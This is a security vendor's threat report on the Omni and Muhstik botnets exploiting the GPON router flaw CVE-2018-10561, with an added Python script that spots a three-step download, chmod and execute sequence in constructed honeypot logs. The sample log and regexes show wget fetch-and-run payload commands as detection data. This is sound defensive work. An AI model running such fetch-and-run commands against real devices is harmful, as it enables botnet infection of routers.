CVE-2018–10561 Dasan GPON exploit weaponized in Omni and Muhstik botnets

NewSky Security
May 8, 2018

Introduction

Almost two years after the inception of the Mirai attack, IoT attackers have shifted to using IoT exploits to take control of devices. The attackers are quick to weaponize one-day exploits, which are low-hanging yet very delicious fruit. While discovering a zero-day in an IoT device may consume time and resources, IoT attackers find it much more effective to track publicly revealed exploits and weaponize them as early as possible for making money.

Roughly a week ago, a critical vulnerability, CVE-2018–10561, affecting over a million GPON home routers was reported along with a proof-of-concept explanation. Attackers wasted little time taking advantage of it: NewSky Security has already observed two unrelated attack attempts:

Attack 1: Omni botnet in the making

A few hours ago, NewSky Security observed attacks targeting the vulnerable GPON routers. The exploit has been weaponized in three steps to download and run Mirai-style payloads for different architectures, as shown in our attack logs below.

Step 1: Payload downloaded from server
Step 2: Payload given executable permission via chmod
Step 3: Payload in action

Payloads hosted in the attacker’s bin repository have a fresh timestamp, as shown below.

Attacker’s bin repository

NewSky Security was able to contact the author of the Omni botnet in the making. For verification, we challenged the proclaimed author with questions that only the botnet developer or admin would be able to answer, and we received correct answers. On condition of anonymity, the botnet author revealed that the Omni botnet is under construction and that he is working on the scanner and payloads. Since the botnet is still in development, it might not show all of its behaviors at the moment.

He also mentioned that, unlike with other exploits, his new botnet wasn’t able to use the && operator to combine the steps of downloading and running the payload because the exploit code was breaking. Hence, he designed a three-phase attack, which explains why we were getting attacks in a sequence of three steps instead of a single shot.
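From the defender's side, the three separate requests described above are also the signal to look for: a download, a chmod and an execution of the same file from the same source within a short window, none of which is conclusive on its own. The following is an added example, not code from NewSky Security or from this post, that correlates that sequence over constructed honeypot-style log lines. The log layout (timestamp, source IP, the command the request tried to run), the file names and the addresses (documentation ranges) are assumptions made for the example.

```python
"""Correlate the three-step download / chmod / execute sequence seen in
the Omni attacks across separate requests from the same source.

Added example for illustration; the log layout, paths and addresses are
constructed and are not NewSky Security's data.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed honeypot-style log: "<timestamp> <source ip> <command the request
# tried to run on the device>". Addresses come from documentation ranges and
# the file names are placeholders, not real indicators.
SAMPLE_LOG = """\
2018-05-08T10:00:01Z 203.0.113.5 wget http://198.51.100.7/bins/sample.mips -O /tmp/sample.mips
2018-05-08T10:00:03Z 203.0.113.5 chmod +x /tmp/sample.mips
2018-05-08T10:00:05Z 203.0.113.5 /tmp/sample.mips
2018-05-08T10:02:00Z 203.0.113.9 wget http://198.51.100.7/bins/sample.arm -O /tmp/sample.arm
2018-05-08T10:20:00Z 203.0.113.9 chmod +x /tmp/sample.arm
2018-05-08T11:00:00Z 192.0.2.44 cat /proc/cpuinfo
"""

# One pattern per step; each captures the staged file so the steps can be tied
# together by (source ip, path) rather than by source ip alone.
STEP_PATTERNS = [
    ("download", re.compile(r"\b(?:wget|curl|tftp)\b.*?(?P<path>/tmp/\S+)")),
    ("chmod", re.compile(r"\bchmod\s+\S+\s+(?P<path>/tmp/\S+)")),
    ("execute", re.compile(r"^(?:sh\s+)?(?P<path>/tmp/\S+)\s*$")),
]
STEP_ORDER = ["download", "chmod", "execute"]


def parse_line(line):
    """Split a constructed log line into (datetime, source ip, command)."""
    ts, ip, cmd = line.split(" ", 2)
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), ip, cmd


def classify(cmd):
    """Return (step name, staged path) for a command, or (None, None)."""
    for name, pattern in STEP_PATTERNS:
        match = pattern.search(cmd)
        if match:
            return name, match.group("path")
    return None, None


def find_staged_infections(log_text, window=timedelta(minutes=5)):
    """Walk the log in order and report every (ip, path) that completed
    download -> chmod -> execute within `window` of the download.

    Returns (complete, stalled): complete is a list of
    (ip, path, [t_download, t_chmod, t_execute]); stalled is a list of
    (ip, path, steps reached) for sequences that never finished in time.
    """
    progress = defaultdict(dict)  # (ip, path) -> {step: timestamp}
    complete = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, ip, cmd = parse_line(line)
        step, path = classify(cmd)
        if step is None:
            continue
        key = (ip, path)
        state = progress[key]
        if step == "download":
            # A fresh download restarts the sequence for this file.
            progress[key] = {"download": ts}
            continue
        if "download" not in state or ts - state["download"] > window:
            continue  # out of order, or too slow to be one staged attack
        if step != STEP_ORDER[len(state)]:
            continue  # e.g. execute before chmod: not the pattern we track
        state[step] = ts
        if step == "execute":
            complete.append((ip, path, [state[s] for s in STEP_ORDER]))
            del progress[key]
    stalled = [(ip, path, [s for s in STEP_ORDER if s in state])
               for (ip, path), state in progress.items() if state]
    return complete, stalled


if __name__ == "__main__":
    done, partial = find_staged_infections(SAMPLE_LOG)
    for ip, path, times in done:
        print(f"staged infection from {ip}: {path} in {times[-1] - times[0]}")
    for ip, path, steps in partial:
        print(f"incomplete sequence from {ip}: {path} reached {steps}")
```

Keying the state on (source IP, staged path) rather than on the IP alone keeps two payloads for different architectures from the same scanner from being mixed up, and the time window separates a scripted three-step attack from unrelated commands arriving hours apart. In the constructed log the second source downloads a file but only issues the chmod 18 minutes later, so it is reported as stalled rather than as a completed infection.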

Although the attacker disclosed a large number of devices that he already controls, NewSky Security will not be mentioning the number as we can’t verify this claim. That said, compromising a large number of devices is very possible, as Shodan has already revealed more than a million GPON devices potentially susceptible to the hack.

The connection between Omni and Owari attacks

While analyzing the new Omni botnet, we observed a number of clues indicating that the attacks are closely related to the Owari botnet. The binary repository IP hosting the Omni bins had already been used by Owari before.

binary repository IP

Also, the IP resolves to 0day(.)life, which has already been associated with Owari in our previous research. This leads us to conclude that the Omni botnet is brewing in the same lab as Owari.

Fun fact: 0day(.)life is presently hosting a bizarrely disturbing yet addictive meme video of the Bitconnect event. The YouTube link is here.

Attack 2: Muhstik botnet adds Dasan GPON bug into its arsenal

Omni is not the only attack group using the Dasan GPON vulnerability: we observed that the infamous Muhstik botnet has also deployed CVE-2018–10561 against our honeypots. Muhstik was discovered by 360 Netlab using DrupalGeddon2 as well as other exploits. In the first eight lines of the image below, we can see the Muhstik C2 deploying eight different exploits, and the last line shows the new GPON infection URL. With the C2 as well as the attack pattern being strikingly similar, there was enough evidence for us to conclude that CVE-2018–10561 is one of the latest weapons in the Muhstik botnet.

8 exploits and new GPON add-on in Muhstik botnet

In a tweet, 360 Netlab confirmed our findings.

Conclusion

The response time of IoT attackers (the time between an IoT exploit being released publicly and attackers weaponizing it for their own benefit) is decreasing rapidly. Attackers are acting quickly not only to win the race against potential updates and patches but also against fellow attackers, as multiple threat actors try to own a device as soon as such exploits are made public.

Some people have been critical of VPNMentor’s early disclosure of the vulnerability before a patch was released. Interestingly, VPNMentor has taken matters into their own hands and come up with a patch of their own, which can be accessed here.

The NewSky Security threat intelligence platform is tracking the usage of CVE-2018–10561 and provides protection against exploitation attempts via IoT Halo.

Ankit Anubhav, Principal Researcher, NewSky Security
